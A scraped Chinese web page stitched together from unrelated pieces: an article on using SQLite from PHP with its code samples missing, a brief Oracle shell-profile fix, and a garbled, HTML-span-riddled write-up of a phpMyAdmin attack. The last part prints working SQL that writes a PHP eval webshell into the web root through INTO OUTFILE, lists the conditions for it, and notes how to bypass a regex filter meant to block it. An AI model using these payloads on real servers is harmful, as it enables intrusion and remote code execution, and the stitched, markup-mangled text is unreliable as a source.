SQLite in PHP

sqlite in PHP

BinzyWu@phpe/文

关键词: sqlite,MysqL,PHP4,PHP5,Pear,触发器,视图,sql

(一)sqlite介绍

sqlite第一个Alpha版本诞生于2000年5月.至今已经有4个年头了.而在今年的5月sqlite也迎来了一个新的里程: sqlite 3.

下面是你访问sqlite官方网站: www.sqlite.org时第一眼看到关于sqlite的特性.

1.ACID事务

2.零配置–无需安装和管理配置

3.储存在单一磁盘文件中的一个完整的数据库

4.数据库文件可以在不同字节顺序的机器间自由的共享

5.支持数据库大小至2TB

6.足够小,大致3万行C代码,250K

7.比一些流行的数据库在大部分普通数据库操作要快

8.简单,轻松的API

9.包含TCL绑定,同时通过Wrapper支持其他语言的绑定

10.良好注释的源代码,并且有着90%以上的测试覆盖率

11.独立:没有额外依赖

12.source完全的Open,你可以用于任何用途,包括出售它

从代码架构图你可以轻松的看出,是的,sqlite非常简单.对,sqlite的设计思想就是简单:

1.简单的管理

2.简单的操作

3.简单的在程序中使用它

4.简单的维护和客制化

因为简单所以它快速,但虽然简单,却仍非常可靠.适合sqlite的应用场所有,网站,嵌入式设备和应用,应用程序文件格式,代替特别的文件,内部或临时数据库,命令行数据集分析工具,在演示或测试中代替企业级数据库,数据库教学,试验sql语言扩展等.但并不是所有都合适,比如在使用Server/Client结构的时候，高负荷的网站，高并发等情况下并不建议使用sqlite.

本文重点在于介绍sqlite在PHP中的应用,PHP作为Web应用中一个重要力量一直在不断的前进和发展.在马上就要Release的PHP的第五个版本中,不再将MysqL作为默认支持,而转为将sqlite的扩展作为默认支持.从某种程度上说MysqL的广泛应用有PHP的很大功劳.虽然说PHP改变默认支持有MysqL的授权改变的原因,但选择sqlite也是有原因的,理由就在于上面所提到的那些特性.其实MysqL从来就不是完全免费的,你无法用于商业用途.而sqlite是完全的open的.

(二)sqlite sql

sqlite的sql从很大程度上实现了ANSI sql92标准.特别的sqlite支持视图,事务,支持嵌套sql.这些都会在下面应用的过程中讲到,故这边先暂时放下,而主要说说sqlite所不支持的一些sql.

1.不支持Exists,虽然支持in(in是Exists的一种情况)

2.不支持多数据库,如: create table db1.table1 as select * from db2.table1;

3.不支持存储过程

4.不支持Alter View/Trigger/Table

5.不支持Truncate,在sqlite中Delete不带Where字句时和Truncate的效果是一样的.

6.不支持Floor和Ceiling函数,还有其他蛮多的函数

7.没有Auto Increment(自增)字段,但是sqlite其实是支持Auto Increment的,即在将该字段设置为”INTEGER PRIMARY KEY”的时候.

8.不支持If Exists

……

详细的sql支持可以访问: http://www.sqlite.org/lang.htm

详细的不支持sql可以访问:http://www.sqlite.org/cvstrac/wiki?p=UnsupportedSql

(三) sqlite的数据类型

首先你会接触到一个让你惊讶的名词: Typelessness(无类型).对! sqlite是无类型的.这意味着你可以保存任何类型的数据到你所想要保存的任何表的任何列中,无论这列声明的数据类型是什么(只有在一种情况下不是,稍后解释).对于sqlite来说对字段不指定类型是完全有效的.如:

诚然sqlite允许忽略数据类型,但是仍然建议在你的Create Table语句中指定数据类型.因为数据类型对于你和其他的程序员交流,或者你准备换掉你的数据库引擎. sqlite支持常见的数据类型,如:

前面提到在某种情况下,sqlite的字段并不是无类型的.即在字段类型为”Integer Primary Key”时.

四的Wrapper

由于sqlite有别于其他数据库引擎的TCP/IP或RPC访问方式,完全地是本地的操作,从某种角度来说你可以说sqlite和MS的Access很相似,但是更小更强大.所谓Wrapper即使对sqlite提供的接口进行封装,使其他语言可以访问,使用sqlite.

sqlite本身是提供C和Tcl的接口的.所以可以非常轻易的和PHP相结合.除了PHP的Wrapper以外,还有许多世界各地的程序员提供了各种语言的sqlite的接口封装,如Python,C++,Java,.Net……所流行的语言基本都有.

五) PHP的环境下使用sqlite

1. PHP下的安装

在PHP5中,sqlite已作为默认支持的模块.在PHP4中你需要进行安装.首先去http://pecl.PHP.net/package/sqlite去下载到sqlite的扩展,注意Windows下的版本需要去http://snaps.PHP.net/win32/PECL_STABLE/PHP_sqlite.dll下载,当然你也可以下载代码自己编译.事实上在linux下只需要使用命令: ‘pear install sqlite’就可以完成安装，而在Win下需要修改PHP.ini,同样的使PHP4支持sqlite.

此时你已经无需再安装任何东西了,而你也已经完全支持sqlite了,一个简单,快速,可靠的数据库.

如果你需要一个管理软件,那么你可以尝试使用sqliteManager (www.sqlitemanager.org),一个与PHPMyAdmin类似的针对sqlite的数据库管理系统.

该系统的界面大致如下:

2.第一个使用sqlite的PHP程序.

我们创建一个叫binzy的数据库,并创建一个叫Binzy的Table,有2个字段,分别是ID,Title.而其中ID为INTEGER PRIMARY KEY,即自增三主键.并在其中插入了2条数据”Binzy”,“Jasmin”.

打开并显示数据:

结果如下,

接下来Insert一条记录,其中我们会使用到sqlite的事务.

如果执行失败,便会出现这样的画面,

成功则是这样的,

是的,如果你已经熟悉使用PHP对MysqL之类的数据库进行操作,那么sqlite几乎是一样的,而且更为简洁.

3.使用Pear::DB (PHP4中)

上面的例子中我们是使用PHP的函数直接对sqlite进行访问,这样的访问方式是不推荐使用的.更好的方式是使用某种数据访问抽象层,如Pear的DB.下面是2中查询例子的重写.使用某个数据访问抽象层会更方便更安全,并且可以在需要进行数据库迁移的时候尽可能减小成本.

4.使用Creole (PHP5中)

Creole是由PHPdb.org开发的面向PHP5的数据访问抽象层.关于Creole可参考本期中的《Creole：新兴数据抽象层》.

Pear::DB并没有针对PHP5进行改变,只是因为PHP5对PHP4良好的兼容性,使得Pear::DB在PHP5下仍能很好的工作.所以在你使用PHP5的时候推荐使用Creole.

六)总结

随着PHP5的即将到来,给我们带来了许多新的语言特性,使PHP更加适合于构建强大健壮的各类系统.而随着PHP5一起走进PHP开发人员视线的sqlite则给我们带来了有别于MysqL的惊喜.是的,他简单却又强大,稳定.而在刚刚过去的六月底新版本的sqlite3已经Release了第一个测试版本,不仅仅带来了新的文件结构,也带来了许多新的特性.

在由root用户切换到Oracle用户时，出现如题所示的问题。

解决办法：在Oracle用户下，vi编辑器打开.bash_profile文件。

配置该文件时有这么一段：

if [ $USER = "oracle" ]; then
if [ $SHELL = "/bin/ksh" ]; then
ulimit -p 16384
ulimit -n 65536
else
ulimit -u 16384 -n 65536
fi
fi
第一、第二行的“=”两边添加空格，这样就ok了！

<span>1</span><span>. 漏洞描述
</span><span>2</span><span>. 漏洞触发条件
</span><span>3</span><span>. 漏洞影响范围
</span><span>4</span><span>. 漏洞代码分析
</span><span>5</span><span>. 防御方法
</span><span>6</span>. 攻防思考

<span>1</span><span>. 已知phpmyadmin的root密码，即mysql的root密码(phpmyadmin只是通过web方式连接mysql的工具)
    </span><span>1</span><span>) mysql本身默认的弱口令
    </span><span>2</span><span>) 通过其他漏洞(例如注入)获得了mysql的root密码
</span><span>2</span><span>. 已知网站的物理路径
    </span><span>1</span>) 在phpmyadmin的后台的<span>"</span><span>变量</span><span>"</span><span>tab页面，可以看到mysql的物理路径，从而推测出网站的物理路径
    </span><span>2</span>) 通过其他web漏洞获得网站的物理路径

----<span>1</span>---<span>
Create TABLE a (cmd text NOT NULL);
Insert INTO a (cmd) VALUES(</span><span>''</span><span><?php @eval($_POST[cmd])?></span><span>''</span><span>);
</span><span>select</span> cmd <span>from</span> a into outfile <span>''</span><span> C:/htdocs/1.php</span><span>''</span><span>;   
Drop TABLE IF EXISTS a;
DROP TABLE IF EXISTS `a`;
</span>----<span>1</span>---

----<span>2</span>---
<span>select</span> <span>''</span><span><?php @eval($_POST[pass]);?></span><span>''</span>INTO OUTFILE <span>''</span><span>d:/wamp/www/exehack.php</span><span>''</span>
----<span>2</span>---

http:<span>//</span><span>www.exehack.net/681.html</span>
http:<span>//</span><span>www.exehack.net/99.html</span>
http:<span>//</span><span>www.187299.com/archives/1695</span>

<span>/*</span><span>
this code point is important
$import_text is the one that need to be check strictly
</span><span>*/</span>
<span>if</span><span> ($go_sql) 
{
    </span><span>//</span><span> parse sql query</span>
    include_once <span>''</span><span>libraries/parse_analyze.inc.php</span><span>''</span><span>;

    </span><span>if</span> (isset($ajax_reload) &amp;&amp; $ajax_reload[<span>''</span><span>reload</span><span>''</span>] === <span>true</span><span>) 
    {
        $response </span>=<span> PMA_Response::getInstance();
        $response</span>-&gt;addJSON(<span>''</span><span>ajax_reload</span><span>''</span><span>, $ajax_reload);
    }
    PMA_executeQueryAndSendQueryResponse(
        $analyzed_sql_results, </span><span>false</span>, $db, $table, <span>null</span>, $import_text, <span>null</span><span>,
        $analyzed_sql_results[</span><span>''</span><span>is_affected</span><span>''</span>], <span>null</span><span>,
        </span><span>null</span>, <span>null</span>, <span>null</span>, $<span>goto</span>, $pmaThemeImage, <span>null</span>, <span>null</span>, <span>null</span><span>, $sql_query,
        </span><span>null</span>, <span>null</span><span>
    );
} 
</span><span>else</span> <span>if</span><span> ($result) 
{
    </span><span>//</span><span> Save a Bookmark with more than one queries (if Bookmark label given).</span>
    <span>if</span> (! empty($_POST[<span>''</span><span>bkm_label</span><span>''</span>]) &amp;&amp; !<span> empty($import_text)) 
    {
        PMA_storeTheQueryAsBookmark(
            $db, $GLOBALS[</span><span>''</span><span>cfg</span><span>''</span>][<span>''</span><span>Bookmark</span><span>''</span>][<span>''</span><span>user</span><span>''</span><span>],
            $import_text, $_POST[</span><span>''</span><span>bkm_label</span><span>''</span><span>],
            isset($_POST[</span><span>''</span><span>bkm_replace</span><span>''</span>]) ? $_POST[<span>''</span><span>bkm_replace</span><span>''</span>] : <span>null</span><span>
        );
    }

    $response </span>=<span> PMA_Response::getInstance();
    $response</span>-&gt;isSuccess(<span>true</span><span>);
    $response</span>-&gt;addJSON(<span>''</span><span>message</span><span>''</span><span>, PMA_Message::success($msg));
    $response</span>-&gt;<span>addJSON(
        </span><span>''</span><span>sql_query</span><span>''</span><span>,
        PMA_Util::getMessage($msg, $sql_query, </span><span>''</span><span>success</span><span>''</span><span>)
    );
} 
</span><span>else</span> <span>if</span> ($result == <span>false</span><span>) 
{
    $response </span>=<span> PMA_Response::getInstance();
    $response</span>-&gt;isSuccess(<span>false</span><span>);
    $response</span>-&gt;addJSON(<span>''</span><span>message</span><span>''</span><span>, PMA_Message::error($msg));
} 
</span><span>else</span><span> 
{
    $active_page </span>= $<span>goto</span><span>;
    include </span><span>''''</span> . $<span>goto</span><span>;
}</span>

<span>if</span>(preg_match(<span>"</span><span>/select.*into.*(outfile|dumpfile)/sim</span><span>"</span><span>, $import_text, $matches))
{
    echo </span><span>"</span><span>request error!</span><span>"</span> . <span>"</span><span></span><span>"</span> . $matches[<span>0</span><span>];
    die();
} </span>

<span>1</span><span>. 定义存储过程
</span><span>2</span><span>. 定义函数
</span><span>3</span><span>. 定义触发器
</span><span>4</span><span>. 使用语法预处理编译
</span><span>/*</span><span>
prepare stmt from ''select count(*) from information_schema.schemata'';
这里待编译的sql语句也可以进行字符变形以此进行bypass
execute stmt;
</span><span>*/</span>

http:<span>//</span><span>php.net/manual/en/function.preg-match.php#111573</span>
http:<span>//</span><span>blog.sina.com.cn/s/blog_3fe961ae01013r8f.html</span>